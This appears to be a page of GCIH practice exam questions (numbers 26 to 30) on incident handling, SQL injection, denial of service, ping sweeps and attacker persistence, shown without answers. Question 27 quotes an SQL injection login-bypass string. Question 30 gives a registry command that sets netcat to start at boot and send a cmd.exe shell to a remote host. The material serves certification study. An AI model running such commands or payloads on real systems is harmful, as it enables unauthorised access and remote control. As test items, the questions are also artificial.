GCIH Exam Question 26

Which of the following procedures is designed to enable security personnel to identify, mitigate, and recover from
malicious computer incidents, such as unauthorized access to a system or data, denialof-service, or unauthorized
changes to system hardware, software, or data?
  • GCIH Exam Question 27

    John works as a Professional Penetration Tester. He has been assigned a project to test the Website security of www.we-are-secure Inc. On the We-are-secure Website login page, he enters ='or''=' as a username and successfully logs on to the user page of the Web site. Now, John asks the we-aresecure Inc. to improve the login page PHP script. Which of the following suggestions can John give to improve the security of the we-are- secure Website login page from the SQL injection attack?
  • GCIH Exam Question 28

    Which of the following types of attacks slows down or stops a server by overloading it with requests?
  • GCIH Exam Question 29

    Adam works as a Network administrator for Umbrella Inc. He noticed that an ICMP ECHO requests is coming from some suspected outside sources. Adam suspects that some malicious hacker is trying to perform ping sweep attack on the network of the company. To stop this malicious activity, Adam blocks the ICMP ECHO request from any outside sources.
    What will be the effect of the action taken by Adam?
  • GCIH Exam Question 30

    You run the following command on the remote Windows server 2003 computer:
    c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe"
    What task do you want to perform by running this command?
    Each correct answer represents a complete solution. Choose all that apply.